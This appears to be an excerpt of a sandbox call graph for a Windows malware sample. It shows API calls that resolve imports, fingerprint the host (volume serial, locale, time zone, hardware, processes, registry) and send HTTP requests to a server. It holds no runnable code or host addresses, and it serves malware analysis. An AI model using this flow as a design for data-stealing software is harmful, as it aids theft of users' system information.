27545c0 34 API calls 65466->65467 65468 27542d4 65467->65468 65469 27545c0 34 API calls 65468->65469 65470 27542ed 65469->65470 65471 27545c0 34 API calls 65470->65471 65472 2754306 65471->65472 65473 27545c0 34 API calls 65472->65473 65474 275431f 65473->65474 65475 27545c0 34 API calls 65474->65475 65476 2754338 65475->65476 65477 27545c0 34 API calls 65476->65477 65478 2754351 65477->65478 65479 27545c0 34 API calls 65478->65479 65480 275436a 65479->65480 65481 27545c0 34 API calls 65480->65481 65482 2754383 65481->65482 65483 27545c0 34 API calls 65482->65483 65484 275439c 65483->65484 65485 27545c0 34 API calls 65484->65485 65486 27543b5 65485->65486 65487 27545c0 34 API calls 65486->65487 65488 27543ce 65487->65488 65489 27545c0 34 API calls 65488->65489 65490 27543e7 65489->65490 65491 27545c0 34 API calls 65490->65491 65492 2754400 65491->65492 65493 27545c0 34 API calls 65492->65493 65494 2754419 65493->65494 65495 27545c0 34 API calls 65494->65495 65496 2754432 65495->65496 65497 27545c0 34 API calls 65496->65497 65498 275444b 65497->65498 65499 27545c0 34 API calls 65498->65499 65500 2754464 65499->65500 65501 27545c0 34 API calls 65500->65501 65502 275447d 65501->65502 65503 27545c0 34 API calls 65502->65503 65504 2754496 65503->65504 65505 27545c0 34 API calls 65504->65505 65506 27544af 65505->65506 65507 27545c0 34 API calls 65506->65507 65508 27544c8 65507->65508 65509 27545c0 34 API calls 65508->65509 65510 27544e1 65509->65510 65511 27545c0 34 API calls 65510->65511 65512 27544fa 65511->65512 65513 27545c0 34 API calls 65512->65513 65514 2754513 65513->65514 65515 27545c0 34 API calls 65514->65515 65516 275452c 65515->65516 65517 27545c0 34 API calls 65516->65517 65518 2754545 65517->65518 65519 27545c0 34 API calls 65518->65519 65520 275455e 65519->65520 65521 27545c0 34 API calls 65520->65521 65522 2754577 65521->65522 65523 27545c0 34 API calls 65522->65523 65524 2754590 65523->65524 65525 27545c0 34 API calls 65524->65525 65526 27545a9 65525->65526 65527 2769c10 65526->65527 65528 276a036 8 API calls 65527->65528 65529 2769c20 43 API calls 65527->65529 65530 276a146 65528->65530 65531 276a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65528->65531 65529->65528 65532 276a216 65530->65532 65533 276a153 8 API calls 65530->65533 65531->65530 65534 276a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65532->65534 65535 276a298 65532->65535 65533->65532 65534->65535 65536 276a337 65535->65536 65537 276a2a5 6 API calls 65535->65537 65538 276a344 9 API calls 65536->65538 65539 276a41f 65536->65539 65537->65536 65538->65539 65540 276a4a2 65539->65540 65541 276a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65539->65541 65542 276a4dc 65540->65542 65543 276a4ab GetProcAddress GetProcAddress 65540->65543 65541->65540 65544 276a515 65542->65544 65545 276a4e5 GetProcAddress GetProcAddress 65542->65545 65543->65542 65546 276a612 65544->65546 65547 276a522 10 API calls 65544->65547 65545->65544 65548 276a67d 65546->65548 65549 276a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65546->65549 65547->65546 65550 276a686 GetProcAddress 65548->65550 65551 276a69e 65548->65551 65549->65548 65550->65551 65552 276a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65551->65552 65553 2765ca3 65551->65553 65552->65553 65554 2751590 65553->65554 66623 2751670 65554->66623 65557 276a7a0 lstrcpy 65558 27515b5 65557->65558 65559 276a7a0 lstrcpy 65558->65559 65560 27515c7 65559->65560 65561 276a7a0 lstrcpy 65560->65561 65562 27515d9 65561->65562 65563 276a7a0 lstrcpy 65562->65563 65564 2751663 65563->65564 65565 2765510 65564->65565 65566 2765521 65565->65566 65567 276a820 2 API calls 65566->65567 65568 276552e 65567->65568 65569 276a820 2 API calls 65568->65569 65570 276553b 65569->65570 65571 276a820 2 API calls 65570->65571 65572 2765548 65571->65572 65573 276a740 lstrcpy 65572->65573 65574 2765555 65573->65574 65575 276a740 lstrcpy 65574->65575 65576 2765562 65575->65576 65577 276a740 lstrcpy 65576->65577 65578 276556f 65577->65578 65579 276a740 lstrcpy 65578->65579 65580 276557c 65579->65580 65581 2765643 StrCmpCA 65580->65581 65582 27656a0 StrCmpCA 65580->65582 65587 276a820 lstrlen lstrcpy 65580->65587 65589 2765856 StrCmpCA 65580->65589 65592 276a740 lstrcpy 65580->65592 65593 276a7a0 lstrcpy 65580->65593 65598 2751590 lstrcpy 65580->65598 65601 2765a0b StrCmpCA 65580->65601 65602 27652c0 29 API calls 65580->65602 65608 276a8a0 lstrcpy 65580->65608 65614 276578a StrCmpCA 65580->65614 65617 276593f StrCmpCA 65580->65617 65618 27651f0 23 API calls 65580->65618 65581->65580 65582->65580 65583 27657dc 65582->65583 65584 276a8a0 lstrcpy 65583->65584 65585 27657e8 65584->65585 65586 276a820 2 API calls 65585->65586 65588 27657f6 65586->65588 65587->65580 65590 276a820 2 API calls 65588->65590 65589->65580 65591 2765991 65589->65591 65595 2765805 65590->65595 65594 276a8a0 lstrcpy 65591->65594 65592->65580 65593->65580 65596 276599d 65594->65596 65597 2751670 lstrcpy 65595->65597 65599 276a820 2 API calls 65596->65599 65619 2765811 65597->65619 65598->65580 65600 27659ab 65599->65600 65603 276a820 2 API calls 65600->65603 65604 2765a16 Sleep 65601->65604 65605 2765a28 65601->65605 65602->65580 65606 27659ba 65603->65606 65604->65580 65607 276a8a0 lstrcpy 65605->65607 65609 2751670 lstrcpy 65606->65609 65610 2765a34 65607->65610 65608->65580 65609->65619 65611 276a820 2 API calls 65610->65611 65612 2765a43 65611->65612 65613 276a820 2 API calls 65612->65613 65615 2765a52 65613->65615 65614->65580 65616 2751670 lstrcpy 65615->65616 65616->65619 65617->65580 65618->65580 65619->64672 65621 2767553 GetVolumeInformationA 65620->65621 65622 276754c 65620->65622 65623 2767591 65621->65623 65622->65621 65624 27675fc GetProcessHeap RtlAllocateHeap 65623->65624 65625 2767628 wsprintfA 65624->65625 65626 2767619 65624->65626 65628 276a740 lstrcpy 65625->65628 65627 276a740 lstrcpy 65626->65627 65629 2765da7 65627->65629 65628->65629 65629->64693 65631 276a7a0 lstrcpy 65630->65631 65632 2754899 65631->65632 66632 27547b0 65632->66632 65634 27548a5 65635 276a740 lstrcpy 65634->65635 65636 27548d7 65635->65636 65637 276a740 lstrcpy 65636->65637 65638 27548e4 65637->65638 65639 276a740 lstrcpy 65638->65639 65640 27548f1 65639->65640 65641 276a740 lstrcpy 65640->65641 65642 27548fe 65641->65642 65643 276a740 lstrcpy 65642->65643 65644 275490b InternetOpenA StrCmpCA 65643->65644 65645 2754944 65644->65645 65646 2754ecb InternetCloseHandle 65645->65646 66640 2768b60 65645->66640 65647 2754ee8 65646->65647 66655 2759ac0 CryptStringToBinaryA 65647->66655 65649 2754963 66648 276a920 65649->66648 65652 2754976 65654 276a8a0 lstrcpy 65652->65654 65659 275497f 65654->65659 65655 276a820 2 API calls 65656 2754f05 65655->65656 65658 276a9b0 4 API calls 65656->65658 65657 2754f27 ctype 65661 276a7a0 lstrcpy 65657->65661 65660 2754f1b 65658->65660 65663 276a9b0 4 API calls 65659->65663 65662 276a8a0 lstrcpy 65660->65662 65674 2754f57 65661->65674 65662->65657 65664 27549a9 65663->65664 65665 276a8a0 lstrcpy 65664->65665 65666 27549b2 65665->65666 65667 276a9b0 4 API calls 65666->65667 65668 27549d1 65667->65668 65669 276a8a0 lstrcpy 65668->65669 65670 27549da 65669->65670 65671 276a920 3 API calls 65670->65671 65672 27549f8 65671->65672 65673 276a8a0 lstrcpy 65672->65673 65675 2754a01 65673->65675 65674->64696 65676 276a9b0 4 API calls 65675->65676 65677 2754a20 65676->65677 65678 276a8a0 lstrcpy 65677->65678 65679 2754a29 65678->65679 65680 276a9b0 4 API calls 65679->65680 65681 2754a48 65680->65681 65682 276a8a0 lstrcpy 65681->65682 65683 2754a51 65682->65683 65684 276a9b0 4 API calls 65683->65684 65685 2754a7d 65684->65685 65686 276a920 3 API calls 65685->65686 65687 2754a84 65686->65687 65688 276a8a0 lstrcpy 65687->65688 65689 2754a8d 65688->65689 65690 2754aa3 InternetConnectA 65689->65690 65690->65646 65691 2754ad3 HttpOpenRequestA 65690->65691 65693 2754ebe InternetCloseHandle 65691->65693 65694 2754b28 65691->65694 65693->65646 65695 276a9b0 4 API calls 65694->65695 65696 2754b3c 65695->65696 65697 276a8a0 lstrcpy 65696->65697 65698 2754b45 65697->65698 65699 276a920 3 API calls 65698->65699 65700 2754b63 65699->65700 65701 276a8a0 lstrcpy 65700->65701 65702 2754b6c 65701->65702 65703 276a9b0 4 API calls 65702->65703 65704 2754b8b 65703->65704 65705 276a8a0 lstrcpy 65704->65705 65706 2754b94 65705->65706 65707 276a9b0 4 API calls 65706->65707 65708 2754bb5 65707->65708 65709 276a8a0 lstrcpy 65708->65709 65710 2754bbe 65709->65710 65711 276a9b0 4 API calls 65710->65711 65712 2754bde 65711->65712 65713 276a8a0 lstrcpy 65712->65713 65714 2754be7 65713->65714 65715 276a9b0 4 API calls 65714->65715 65716 2754c06 65715->65716 65717 276a8a0 lstrcpy 65716->65717 65718 2754c0f 65717->65718 65719 276a920 3 API calls 65718->65719 65720 2754c2d 65719->65720 65721 276a8a0 lstrcpy 65720->65721 65722 2754c36 65721->65722 65723 276a9b0 4 API calls 65722->65723 65724 2754c55 65723->65724 65725 276a8a0 lstrcpy 65724->65725 65726 2754c5e 65725->65726 65727 276a9b0 4 API calls 65726->65727 65728 2754c7d 65727->65728 65729 276a8a0 lstrcpy 65728->65729 65730 2754c86 65729->65730 65731 276a920 3 API calls 65730->65731 65732 2754ca4 65731->65732 65733 276a8a0 lstrcpy 65732->65733 65734 2754cad 65733->65734 65735 276a9b0 4 API calls 65734->65735 65736 2754ccc 65735->65736 65737 276a8a0 lstrcpy 65736->65737 65738 2754cd5 65737->65738 65739 276a9b0 4 API calls 65738->65739 65740 2754cf6 65739->65740 65741 276a8a0 lstrcpy 65740->65741 65742 2754cff 65741->65742 65743 276a9b0 4 API calls 65742->65743 65744 2754d1f 65743->65744 65745 276a8a0 lstrcpy 65744->65745 65746 2754d28 65745->65746 65747 276a9b0 4 API calls 65746->65747 65748 2754d47 65747->65748 65749 276a8a0 lstrcpy 65748->65749 65750 2754d50 65749->65750 65751 276a920 3 API calls 65750->65751 65752 2754d6e 65751->65752 65753 276a8a0 lstrcpy 65752->65753 65754 2754d77 65753->65754 65755 276a740 lstrcpy 65754->65755 65756 2754d92 65755->65756 65757 276a920 3 API calls 65756->65757 65758 2754db3 65757->65758 65759 276a920 3 API calls 65758->65759 65760 2754dba 65759->65760 65761 276a8a0 lstrcpy 65760->65761 65762 2754dc6 65761->65762 65763 2754de7 lstrlen 65762->65763 65764 2754dfa 65763->65764 65765 2754e03 lstrlen 65764->65765 66654 276aad0 65765->66654 65767 2754e13 HttpSendRequestA 65768 2754e32 InternetReadFile 65767->65768 65769 2754e67 InternetCloseHandle 65768->65769 65774 2754e5e 65768->65774 65772 276a800 65769->65772 65771 276a9b0 4 API calls 65771->65774 65772->65693 65773 276a8a0 lstrcpy 65773->65774 65774->65768 65774->65769 65774->65771 65774->65773 66664 276aad0 65775->66664 65777 27617c4 StrCmpCA 65778 27617d7 65777->65778 65779 27617cf ExitProcess 65777->65779 65780 27617e7 strtok_s 65778->65780 65792 27617f4 65780->65792 65781 27619c2 65781->64698 65782 276199e strtok_s 65782->65792 65783 2761932 StrCmpCA 65783->65792 65784 2761913 StrCmpCA 65784->65792 65785 2761970 StrCmpCA 65785->65792 65786 27618f1 StrCmpCA 65786->65792 65787 2761951 StrCmpCA 65787->65792 65788 276187f StrCmpCA 65788->65792 65789 276185d StrCmpCA 65789->65792 65790 27618cf StrCmpCA 65790->65792 65791 27618ad StrCmpCA 65791->65792 65792->65781 65792->65782 65792->65783 65792->65784 65792->65785 65792->65786 65792->65787 65792->65788 65792->65789 65792->65790 65792->65791 65793 276a820 lstrlen lstrcpy 65792->65793 65794 276a820 2 API calls 65792->65794 65793->65792 65794->65782 65796 276a7a0 lstrcpy 65795->65796 65797 2755979 65796->65797 65798 27547b0 5 API calls 65797->65798 65799 2755985 65798->65799 65800 276a740 lstrcpy 65799->65800 65801 27559ba 65800->65801 65802 276a740 lstrcpy 65801->65802 65803 27559c7 65802->65803 65804 276a740 lstrcpy 65803->65804 65805 27559d4 65804->65805 65806 276a740 lstrcpy 65805->65806 65807 27559e1 65806->65807 65808 276a740 lstrcpy 65807->65808 65809 27559ee InternetOpenA StrCmpCA 65808->65809 65810 2755a1d 65809->65810 65811 2755fc3 InternetCloseHandle 65810->65811 65813 2768b60 3 API calls 65810->65813 65812 2755fe0 65811->65812 65815 2759ac0 4 API calls 65812->65815 65814 2755a3c 65813->65814 65816 276a920 3 API calls 65814->65816 65817 2755fe6 65815->65817 65818 2755a4f 65816->65818 65820 276a820 2 API calls 65817->65820 65822 275601f ctype 65817->65822 65819 276a8a0 lstrcpy 65818->65819 65825 2755a58 65819->65825 65821 2755ffd 65820->65821 65823 276a9b0 4 API calls 65821->65823 65826 276a7a0 lstrcpy 65822->65826 65824 2756013 65823->65824 65827 276a8a0 lstrcpy 65824->65827 65828 276a9b0 4 API calls 65825->65828 65836 275604f 65826->65836 65827->65822 65829 2755a82 65828->65829 65830 276a8a0 lstrcpy 65829->65830 65831 2755a8b 65830->65831 65832 276a9b0 4 API calls 65831->65832 65833 2755aaa 65832->65833 65834 276a8a0 lstrcpy 65833->65834 65835 2755ab3 65834->65835 65837 276a920 3 API calls 65835->65837 65836->64704 65838 2755ad1 65837->65838 65839 276a8a0 lstrcpy 65838->65839 65840 2755ada 65839->65840 65841 276a9b0 4 API calls 65840->65841 65842 2755af9 65841->65842 65843 276a8a0 lstrcpy 65842->65843 65844 2755b02 65843->65844 65845 276a9b0 4 API calls 65844->65845 65846 2755b21 65845->65846 65847 276a8a0 lstrcpy 65846->65847 65848 2755b2a 65847->65848 65849 276a9b0 4 API calls 65848->65849 65850 2755b56 65849->65850 65851 276a920 3 API calls 65850->65851 65852 2755b5d 65851->65852 65853 276a8a0 lstrcpy 65852->65853 65854 2755b66 65853->65854 65855 2755b7c InternetConnectA 65854->65855 65855->65811 65856 2755bac HttpOpenRequestA 65855->65856 65858 2755fb6 InternetCloseHandle 65856->65858 65859 2755c0b 65856->65859 65858->65811 65860 276a9b0 4 API calls 65859->65860 65861 2755c1f 65860->65861 65862 276a8a0 lstrcpy 65861->65862 65863 2755c28 65862->65863 65864 276a920 3 API calls 65863->65864 65865 2755c46 65864->65865 65866 276a8a0 lstrcpy 65865->65866 65867 2755c4f 65866->65867 65868 276a9b0 4 API calls 65867->65868 65869 2755c6e 65868->65869 65870 276a8a0 lstrcpy 65869->65870 65871 2755c77 65870->65871 65872 276a9b0 4 API calls 65871->65872 65873 2755c98 65872->65873 65874 276a8a0 lstrcpy 65873->65874 65875 2755ca1 65874->65875 65876 276a9b0 4 API calls 65875->65876 65877 2755cc1 65876->65877 65878 276a8a0 lstrcpy 65877->65878 65879 2755cca 65878->65879 65880 276a9b0 4 API calls 65879->65880 65881 2755ce9 65880->65881 65882 276a8a0 lstrcpy 65881->65882 65883 2755cf2 65882->65883 65884 276a920 3 API calls 65883->65884 65885 2755d10 65884->65885 65886 276a8a0 lstrcpy 65885->65886 65887 2755d19 65886->65887 65888 276a9b0 4 API calls 65887->65888 65889 2755d38 65888->65889 65890 276a8a0 lstrcpy 65889->65890 65891 2755d41 65890->65891 65892 276a9b0 4 API calls 65891->65892 65893 2755d60 65892->65893 65894 276a8a0 lstrcpy 65893->65894 65895 2755d69 65894->65895 65896 276a920 3 API calls 65895->65896 65897 2755d87 65896->65897 65898 276a8a0 lstrcpy 65897->65898 65899 2755d90 65898->65899 65900 276a9b0 4 API calls 65899->65900 65901 2755daf 65900->65901 65902 276a8a0 lstrcpy 65901->65902 65903 2755db8 65902->65903 65904 276a9b0 4 API calls 65903->65904 65905 2755dd9 65904->65905 65906 276a8a0 lstrcpy 65905->65906 65907 2755de2 65906->65907 65908 276a9b0 4 API calls 65907->65908 65909 2755e02 65908->65909 65910 276a8a0 lstrcpy 65909->65910 65911 2755e0b 65910->65911 65912 276a9b0 4 API calls 65911->65912 65913 2755e2a 65912->65913 65914 276a8a0 lstrcpy 65913->65914 65915 2755e33 65914->65915 65916 276a920 3 API calls 65915->65916 65917 2755e54 65916->65917 65918 276a8a0 lstrcpy 65917->65918 65919 2755e5d 65918->65919 65920 2755e70 lstrlen 65919->65920 66665 276aad0 65920->66665 65922 2755e81 lstrlen GetProcessHeap RtlAllocateHeap 66666 276aad0 65922->66666 65924 2755eae lstrlen 66667 276aad0 65924->66667 65926 2755ebe memcpy 66668 276aad0 65926->66668 65928 2755ed7 lstrlen 65929 2755ee7 65928->65929 65930 2755ef0 lstrlen memcpy 65929->65930 66669 276aad0 65930->66669 65932 2755f1a lstrlen 66670 276aad0 65932->66670 65934 2755f2a HttpSendRequestA 65935 2755f35 InternetReadFile 65934->65935 65936 2755f6a InternetCloseHandle 65935->65936 65940 2755f61 65935->65940 65936->65858 65938 276a9b0 4 API calls 65938->65940 65939 276a8a0 lstrcpy 65939->65940 65940->65935 65940->65936 65940->65938 65940->65939 66671 276aad0 65941->66671 65943 2761077 strtok_s 65947 2761084 65943->65947 65944 276112d strtok_s 65944->65947 65945 2761151 65945->64706 65946 276a820 lstrlen lstrcpy 65946->65947 65947->65944 65947->65945 65947->65946 66672 276aad0 65948->66672 65950 2760db7 strtok_s 65956 2760dc4 65950->65956 65951 2760f17 65951->64714 65952 2760ef3 strtok_s 65952->65956 65953 2760e27 StrCmpCA 65953->65956 65954 2760e67 StrCmpCA 65954->65956 65955 2760ea4 StrCmpCA 65955->65956 65956->65951 65956->65952 65956->65953 65956->65954 65956->65955 65957 276a820 lstrlen lstrcpy 65956->65957 65957->65956 66673 276aad0 65958->66673 65960 2760f67 strtok_s 65962 2760f74 65960->65962 65961 2761044 65961->64722 65962->65961 65963 2760fb2 StrCmpCA 65962->65963 65964 2761020 strtok_s 65962->65964 65965 276a820 lstrlen lstrcpy 65962->65965 65963->65962 65964->65962 65965->65962 65967 276a740 lstrcpy 65966->65967 65968 2761a26 65967->65968 65969 276a9b0 4 API calls 65968->65969 65970 2761a37 65969->65970 65971 276a8a0 lstrcpy 65970->65971 65972 2761a40 65971->65972 65973 276a9b0 4 API calls 65972->65973 65974 2761a5b 65973->65974 65975 276a8a0 lstrcpy 65974->65975 65976 2761a64 65975->65976 65977 276a9b0 4 API calls 65976->65977 65978 2761a7d 65977->65978 65979 276a8a0 lstrcpy 65978->65979 65980 2761a86 65979->65980 65981 276a9b0 4 API calls 65980->65981 65982 2761aa1 65981->65982 65983 276a8a0 lstrcpy 65982->65983 65984 2761aaa 65983->65984 65985 276a9b0 4 API calls 65984->65985 65986 2761ac3 65985->65986 65987 276a8a0 lstrcpy 65986->65987 65988 2761acc 65987->65988 65989 276a9b0 4 API calls 65988->65989 65990 2761ae7 65989->65990 65991 276a8a0 lstrcpy 65990->65991 65992 2761af0 65991->65992 65993 276a9b0 4 API calls 65992->65993 65994 2761b09 65993->65994 65995 276a8a0 lstrcpy 65994->65995 65996 2761b12 65995->65996 65997 276a9b0 4 API calls 65996->65997 65998 2761b2d 65997->65998 65999 276a8a0 lstrcpy 65998->65999 66000 2761b36 65999->66000 66001 276a9b0 4 API calls 66000->66001 66002 2761b4f 66001->66002 66003 276a8a0 lstrcpy 66002->66003 66004 2761b58 66003->66004 66005 276a9b0 4 API calls 66004->66005 66006 2761b76 66005->66006 66007 276a8a0 lstrcpy 66006->66007 66008 2761b7f 66007->66008 66009 2767500 6 API calls 66008->66009 66010 2761b96 66009->66010 66011 276a920 3 API calls 66010->66011 66012 2761ba9 66011->66012 66013 276a8a0 lstrcpy 66012->66013 66014 2761bb2 66013->66014 66015 276a9b0 4 API calls 66014->66015 66016 2761bdc 66015->66016 66017 276a8a0 lstrcpy 66016->66017 66018 2761be5 66017->66018 66019 276a9b0 4 API calls 66018->66019 66020 2761c05 66019->66020 66021 276a8a0 lstrcpy 66020->66021 66022 2761c0e 66021->66022 66674 2767690 GetProcessHeap RtlAllocateHeap 66022->66674 66025 276a9b0 4 API calls 66026 2761c2e 66025->66026 66027 276a8a0 lstrcpy 66026->66027 66028 2761c37 66027->66028 66029 276a9b0 4 API calls 66028->66029 66030 2761c56 66029->66030 66031 276a8a0 lstrcpy 66030->66031 66032 2761c5f 66031->66032 66033 276a9b0 4 API calls 66032->66033 66034 2761c80 66033->66034 66035 276a8a0 lstrcpy 66034->66035 66036 2761c89 66035->66036 66681 27677c0 GetCurrentProcess IsWow64Process 66036->66681 66039 276a9b0 4 API calls 66040 2761ca9 66039->66040 66041 276a8a0 lstrcpy 66040->66041 66042 2761cb2 66041->66042 66043 276a9b0 4 API calls 66042->66043 66044 2761cd1 66043->66044 66045 276a8a0 lstrcpy 66044->66045 66046 2761cda 66045->66046 66047 276a9b0 4 API calls 66046->66047 66048 2761cfb 66047->66048 66049 276a8a0 lstrcpy 66048->66049 66050 2761d04 66049->66050 66051 2767850 3 API calls 66050->66051 66052 2761d14 66051->66052 66053 276a9b0 4 API calls 66052->66053 66054 2761d24 66053->66054 66055 276a8a0 lstrcpy 66054->66055 66056 2761d2d 66055->66056 66057 276a9b0 4 API calls 66056->66057 66058 2761d4c 66057->66058 66059 276a8a0 lstrcpy 66058->66059 66060 2761d55 66059->66060 66061 276a9b0 4 API calls 66060->66061 66062 2761d75 66061->66062 66063 276a8a0 lstrcpy 66062->66063 66064 2761d7e 66063->66064 66065 27678e0 3 API calls 66064->66065 66066 2761d8e 66065->66066 66067 276a9b0 4 API calls 66066->66067 66068 2761d9e 66067->66068 66069 276a8a0 lstrcpy 66068->66069 66070 2761da7 66069->66070 66071 276a9b0 4 API calls 66070->66071 66072 2761dc6 66071->66072 66073 276a8a0 lstrcpy 66072->66073 66074 2761dcf 66073->66074 66075 276a9b0 4 API calls 66074->66075 66076 2761df0 66075->66076 66077 276a8a0 lstrcpy 66076->66077 66078 2761df9 66077->66078 66683 2767980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 66078->66683 66081 276a9b0 4 API calls 66082 2761e19 66081->66082 66083 276a8a0 lstrcpy 66082->66083 66084 2761e22 66083->66084 66085 276a9b0 4 API calls 66084->66085 66086 2761e41 66085->66086 66087 276a8a0 lstrcpy 66086->66087 66088 2761e4a 66087->66088 66089 276a9b0 4 API calls 66088->66089 66090 2761e6b 66089->66090 66091 276a8a0 lstrcpy 66090->66091 66092 2761e74 66091->66092 66685 2767a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 66092->66685 66095 276a9b0 4 API calls 66096 2761e94 66095->66096 66097 276a8a0 lstrcpy 66096->66097 66098 2761e9d 66097->66098 66099 276a9b0 4 API calls 66098->66099 66100 2761ebc 66099->66100 66101 276a8a0 lstrcpy 66100->66101 66102 2761ec5 66101->66102 66103 276a9b0 4 API calls 66102->66103 66104 2761ee5 66103->66104 66105 276a8a0 lstrcpy 66104->66105 66106 2761eee 66105->66106 66688 2767b00 GetUserDefaultLocaleName 66106->66688 66109 276a9b0 4 API calls 66110 2761f0e 66109->66110 66111 276a8a0 lstrcpy 66110->66111 66112 2761f17 66111->66112 66113 276a9b0 4 API calls 66112->66113 66114 2761f36 66113->66114 66115 276a8a0 lstrcpy 66114->66115 66116 2761f3f 66115->66116 66117 276a9b0 4 API calls 66116->66117 66118 2761f60 66117->66118 66119 276a8a0 lstrcpy 66118->66119 66120 2761f69 66119->66120 66693 2767b90 66120->66693 66122 2761f80 66123 276a920 3 API calls 66122->66123 66124 2761f93 66123->66124 66125 276a8a0 lstrcpy 66124->66125 66126 2761f9c 66125->66126 66127 276a9b0 4 API calls 66126->66127 66128 2761fc6 66127->66128 66129 276a8a0 lstrcpy 66128->66129 66130 2761fcf 66129->66130 66131 276a9b0 4 API calls 66130->66131 66132 2761fef 66131->66132 66133 276a8a0 lstrcpy 66132->66133 66134 2761ff8 66133->66134 66705 2767d80 GetSystemPowerStatus 66134->66705 66137 276a9b0 4 API calls 66138 2762018 66137->66138 66139 276a8a0 lstrcpy 66138->66139 66140 2762021 66139->66140 66141 276a9b0 4 API calls 66140->66141 66142 2762040 66141->66142 66143 276a8a0 lstrcpy 66142->66143 66144 2762049 66143->66144 66145 276a9b0 4 API calls 66144->66145 66146 276206a 66145->66146 66147 276a8a0 lstrcpy 66146->66147 66148 2762073 66147->66148 66149 276207e GetCurrentProcessId 66148->66149 66707 2769470 OpenProcess 66149->66707 66152 276a920 3 API calls 66153 27620a4 66152->66153 66154 276a8a0 lstrcpy 66153->66154 66155 27620ad 66154->66155 66156 276a9b0 4 API calls 66155->66156 66157 27620d7 66156->66157 66158 276a8a0 lstrcpy 66157->66158 66159 27620e0 66158->66159 66160 276a9b0 4 API calls 66159->66160 66161 2762100 66160->66161 66162 276a8a0 lstrcpy 66161->66162 66163 2762109 66162->66163 66712 2767e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 66163->66712 66166 276a9b0 4 API calls 66167 2762129 66166->66167 66168 276a8a0 lstrcpy 66167->66168 66169 2762132 66168->66169 66170 276a9b0 4 API calls 66169->66170 66171 2762151 66170->66171 66172 276a8a0 lstrcpy 66171->66172 66173 276215a 66172->66173 66174 276a9b0 4 API calls 66173->66174 66175 276217b 66174->66175 66176 276a8a0 lstrcpy 66175->66176 66177 2762184 66176->66177 66716 2767f60 66177->66716 66180 276a9b0 4 API calls 66181 27621a4 66180->66181 66182 276a8a0 lstrcpy 66181->66182 66183 27621ad 66182->66183 66184 276a9b0 4 API calls 66183->66184 66185 27621cc 66184->66185 66186 276a8a0 lstrcpy 66185->66186 66187 27621d5 66186->66187 66188 276a9b0 4 API calls 66187->66188 66189 27621f6 66188->66189 66190 276a8a0 lstrcpy 66189->66190 66191 27621ff 66190->66191 66729 2767ed0 GetSystemInfo wsprintfA 66191->66729 66194 276a9b0 4 API calls 66195 276221f 66194->66195 66196 276a8a0 lstrcpy 66195->66196 66197 2762228 66196->66197 66198 276a9b0 4 API calls 66197->66198 66199 2762247 66198->66199 66200 276a8a0 lstrcpy 66199->66200 66201 2762250 66200->66201 66202 276a9b0 4 API calls 66201->66202 66203 2762270 66202->66203 66204 276a8a0 lstrcpy 66203->66204 66205 2762279 66204->66205 66731 2768100 GetProcessHeap RtlAllocateHeap 66205->66731 66208 276a9b0 4 API calls 66209 2762299 66208->66209 66210 276a8a0 lstrcpy 66209->66210 66211 27622a2 66210->66211 66212 276a9b0 4 API calls 66211->66212 66213 27622c1 66212->66213 66214 276a8a0 lstrcpy 66213->66214 66215 27622ca 66214->66215 66216 276a9b0 4 API calls 66215->66216 66217 27622eb 66216->66217 66218 276a8a0 lstrcpy 66217->66218 66219 27622f4 66218->66219 66737 27687c0 7 API calls 66219->66737 66222 276a920 3 API calls 66223 276231e 66222->66223 66224 276a8a0 lstrcpy 66223->66224 66225 2762327 66224->66225 66226 276a9b0 4 API calls 66225->66226 66227 2762351 66226->66227 66228 276a8a0 lstrcpy 66227->66228 66229 276235a 66228->66229 66230 276a9b0 4 API calls 66229->66230 66231 276237a 66230->66231 66232 276a8a0 lstrcpy 66231->66232 66233 2762383 66232->66233 66234 276a9b0 4 API calls 66233->66234 66235 27623a2 66234->66235 66236 276a8a0 lstrcpy 66235->66236 66237 27623ab 66236->66237 66740 27681f0 66237->66740 66239 27623c2 66240 276a920 3 API calls 66239->66240 66241 27623d5 66240->66241 66242 276a8a0 lstrcpy 66241->66242 66243 27623de 66242->66243 66244 276a9b0 4 API calls 66243->66244 66245 276240a 66244->66245 66246 276a8a0 lstrcpy 66245->66246 66247 2762413 66246->66247 66248 276a9b0 4 API calls 66247->66248 66249 2762432 66248->66249 66250 276a8a0 lstrcpy 66249->66250 66251 276243b 66250->66251 66252 276a9b0 4 API calls 66251->66252 66253 276245c 66252->66253 66254 276a8a0 lstrcpy 66253->66254 66255 2762465 66254->66255 66256 276a9b0 4 API calls 66255->66256 66257 2762484 66256->66257 66258 276a8a0 lstrcpy 66257->66258 66259 276248d 66258->66259 66260 276a9b0 4 API calls 66259->66260 66261 27624ae 66260->66261 66262 276a8a0 lstrcpy 66261->66262 66263 27624b7 66262->66263 66749 2768320 66263->66749 66265 27624d3 66266 276a920 3 API calls 66265->66266 66267 27624e6 66266->66267 66268 276a8a0 lstrcpy 66267->66268 66269 27624ef 66268->66269 66270 276a9b0 4 API calls 66269->66270 66271 2762519 66270->66271 66272 276a8a0 lstrcpy 66271->66272 66273 2762522 66272->66273 66274 276a9b0 4 API calls 66273->66274 66275 2762543 66274->66275 66276 276a8a0 lstrcpy 66275->66276 66277 276254c 66276->66277 66278 2768320 17 API calls 66277->66278 66279 2762568 66278->66279 66280 276a920 3 API calls 66279->66280 66281 276257b 66280->66281 66282 276a8a0 lstrcpy 66281->66282 66283 2762584 66282->66283 66284 276a9b0 4 API calls 66283->66284 66285 27625ae 66284->66285 66286 276a8a0 lstrcpy 66285->66286 66287 27625b7 66286->66287 66288 276a9b0 4 API calls 66287->66288 66289 27625d6 66288->66289 66290 276a8a0 lstrcpy 66289->66290 66291 27625df 66290->66291 66292 276a9b0 4 API calls 66291->66292 66293 2762600 66292->66293 66294 276a8a0 lstrcpy 66293->66294 66295 2762609 66294->66295 66785 2768680 66295->66785 66297 2762620 66298 276a920 3 API calls 66297->66298 66299 2762633 66298->66299 66300 276a8a0 lstrcpy 66299->66300 66301 276263c 66300->66301 66302 276265a lstrlen 66301->66302 66303 276266a 66302->66303 66304 276a740 lstrcpy 66303->66304 66305 276267c 66304->66305 66306 2751590 lstrcpy 66305->66306 66307 276268d 66306->66307 66795 2765190 66307->66795 66309 2762699 